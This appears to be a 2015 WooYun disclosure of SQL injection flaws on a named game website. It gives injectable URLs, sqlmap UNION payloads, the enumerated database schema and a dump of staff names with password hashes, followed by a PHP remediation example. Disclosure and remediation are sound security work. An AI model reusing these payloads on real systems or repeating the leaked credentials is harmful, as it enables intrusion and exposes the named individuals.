Vulnerability summary

Defect ID: wooyun-2015-0119438

Title: Linekong Technology (热血西游) website, multiple SQL injections bundled

Vendor: linekong.com

Author: 路人甲

Submitted: 2015-06-10 09:46

Fixed: 2015-07-25 18:26

Published: 2015-07-25 18:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-06-10: Details sent to the vendor, awaiting vendor handling
2015-06-10: Vendor has confirmed; details disclosed to the vendor only
2015-06-20: Details disclosed to core white hats and relevant domain experts
2015-06-30: Details disclosed to ordinary white hats
2015-07-10: Details disclosed to intern white hats
2015-07-25: Details disclosed to the public

Brief description:

As in the title.

Detailed description:

Five injection points (three POST, two GET).
Injection #1: POST injection

http://rx.8864.com/gonglist.php?sort_id=*
POST parameters
passportName_login=vhuuhbwv&passportPswd_login=111122223&save=on&save_password=on&validate_login=vhuuhbwv
Injection point: sort_id


Injection #2: POST injection

http://rx.8864.com/imagelist.php?page=2&sort_id=*
POST parameters
passportName_login=cyfjcsuj&passportPswd_login=111122223&save=on&save_password=on&validate_login=cyfjcsuj
Injection point: sort_id


Injection #3: GET injection

http://rx.8864.com/imagelist.php?page=2&sort_id=*
Injection point: sort_id


Injection #4: POST injection

http://rx.8864.com/imagelist.php?&sort_id=*
POST parameters
passportName_login=rmsggysd&passportPswd_login=111122223&save=on&save_password=on&validate_login=rmsggysd
Injection point: sort_id


Injection #5: GET injection

http://rx.8864.com/imagelist.php?&sort_id=*
Injection point: sort_id


[Image: 1.jpg]


sqlmap identified the following injection points with a total of 891 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 6013,6013,[QUERY],6013--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] information_schema
[*] rxxy_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 1926,1926,[QUERY],1926--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
[31 tables]
+------------------------------+
| rxxy_activity_firstjh_cdkey |
| rxxy_activity_firstjh_log |
| rxxy_activity_firstjh_lunpan |
| rxxy_activity_firstjh_vote |
| rxxy_address |
| rxxy_article |
| rxxy_article_inserl |
| rxxy_build |
| rxxy_channel |
| rxxy_columns |
| rxxy_comment |
| rxxy_download |
| rxxy_editors_inserl |
| rxxy_flash |
| rxxy_grading |
| rxxy_group |
| rxxy_image |
| rxxy_image_inserl |
| rxxy_member |
| rxxy_passportstat |
| rxxy_sort |
| rxxy_template |
| rxxy_url |
| rxxy_url_inserl |
| rxxy_vote |
| rxxy_vote_inserl |
| rxxy_vote_option |
| rxxy_wj_article |
| rxxy_wj_article_inserl |
| rxxy_wj_image |
| rxxy_wj_image_inserl |
+------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 9254,9254,[QUERY],9254--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 4670,4670,[QUERY],4670--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 7537,7537,[QUERY],7537--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (random number) - 4 columns
Payload: http://rx.8864.com:80/gonglist.php?sort_id=-8328) UNION ALL SELECT 7359,7359,CONCAT(0x71717a6a71,0x50785a425a4249434f64,0x7176626271),7359--
Vector: UNION ALL SELECT 6116,6116,[QUERY],6116--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: rxxy_web
Table: rxxy_member
[9 entries]
+-----------+----------------------------------+
| user_name | user_passwd |
+-----------+----------------------------------+
| 董勇 | 862f3760ca3293437b53cac01b0ffe29 |
| 王磊 | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师 | cbef2ead7978557272b0c692f356b3cd |
| 韩秋莹 | 2f090f77c0d55fdf508e324140050160 |
| 张静 | a10f4b7e48419178177232d2d31dc4b8 |
| 张晨 | 92a870e23eaac7b3c576e91b807f2a60 |
| 李治 | 7e42a7ea7643c35fa5854f0f8d6e9131 |
| 黄孟琪 | 471c75ee6643a10934502bdafee198fb |
+-----------+----------------------------------+

Proof of vulnerability:


Remediation:

Parameter filtering.

Copyright notice: when reposting, please credit the source 路人甲@乌云
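The remediation above, worked through for the sort_id and page parameters, as an added PHP example; this is not code from the reported site (its source is not on the page). It assumes a PDO connection to the rxxy_web database; rxxy_article is a table from the sqlmap listing above, but its columns id, title and sort_id, and the function names, are assumptions.

```php
<?php
// Added example, not the site's own code. Assumes a PDO connection to rxxy_web;
// the columns id, title and sort_id on rxxy_article are assumptions.
declare(strict_types=1);

// Vulnerable pattern implied by the sqlmap payload above: the raw query-string
// value is pasted into the SQL text, so a value such as
// "-8328) UNION ALL SELECT ..." closes the parenthesis and appends its own query.
function listArticlesVulnerable(PDO $pdo, array $get): array
{
    $sortId = $get['sort_id'] ?? '';
    $sql = "SELECT id, title FROM rxxy_article WHERE (sort_id = {$sortId}) ORDER BY id DESC";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: reject anything that is not a positive integer, then bind
// the value as a typed parameter so the database never parses it as SQL.
function listArticlesSafe(PDO $pdo, array $get): array
{
    $sortId = filter_var(
        $get['sort_id'] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($sortId === false) {
        http_response_code(400);   // "sort_id=-8328) UNION ..." is rejected here
        return [];
    }

    $stmt = $pdo->prepare(
        'SELECT id, title FROM rxxy_article WHERE sort_id = :sort_id ORDER BY id DESC'
    );
    $stmt->bindValue(':sort_id', $sortId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Same treatment for the page parameter of imagelist.php: validate it as a
// positive integer before it is used to compute a LIMIT offset.
function pageOffset(array $get, int $perPage = 20): int
{
    $page = filter_var(
        $get['page'] ?? 1,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    return $page === false ? 0 : ($page - 1) * $perPage;
}

// Connection with emulated prepares disabled, so MySQL itself performs the
// parameter binding (server-side prepared statements) and errors surface as
// exceptions instead of silently returning false.
function connect(string $dsn, string $user, string $password): PDO
{
    return new PDO($dsn, $user, $password, [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}
```

The type check and the prepared statement are independent layers: the check turns sqlmap's probes into 400 responses that stand out in the access log, and the bound parameter protects the query even if a future code path forgets the check. A related point visible in the dump above is that user_passwd is a varchar(32) holding 32 hex characters, which is consistent with an unsalted 32-character hash; storing passwords with password_hash() and checking them with password_verify() would close that secondary weakness.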


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-06-10 18:25

Vendor reply:

This product has already been taken offline; we are proceeding to shut down the site. Thank you.

Latest status:

None yet

